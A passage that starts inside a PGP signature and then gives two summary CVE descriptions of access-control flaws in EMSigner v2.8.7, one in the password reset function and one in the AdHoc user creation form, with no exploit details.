y66zYDS1LtBKC+OjnypiUaI46IhqV3474dhPn13E5GqoeQxaT+YI5Zan8EZEVqkT 3TDTdjMfha9zXv/pEEHaoE9vZ+GDwtsNFxQN0CPTdAsyLpkpiKfjfBz1Vxo8UJyr t+iRNSg8VIe8n0jkd8ekb8GVbgY4WVeyVyz+qlGKPKmXdlVTt17vsMJu9jB/gmeU tl4ZZCrR5UVujekUqg0x1//UcdjTUkF7RMDU92k0whQftWOmaCA= =5TPU -----END PGP SIGNATURE-----

CVE-2023-42326

Incorrect access control in the Forgot Your Password function of EMSigner v2.8.7 allows unauthenticated attackers to access accounts of all registered users, including those with administrator privileges via a crafted password reset token.

CVE-2023-43902

Incorrect access control in the AdHoc User creation form of EMSigner v2.8.7 allows unauthenticated attackers to arbitrarily modify usernames and privileges by using the email address of a registered user.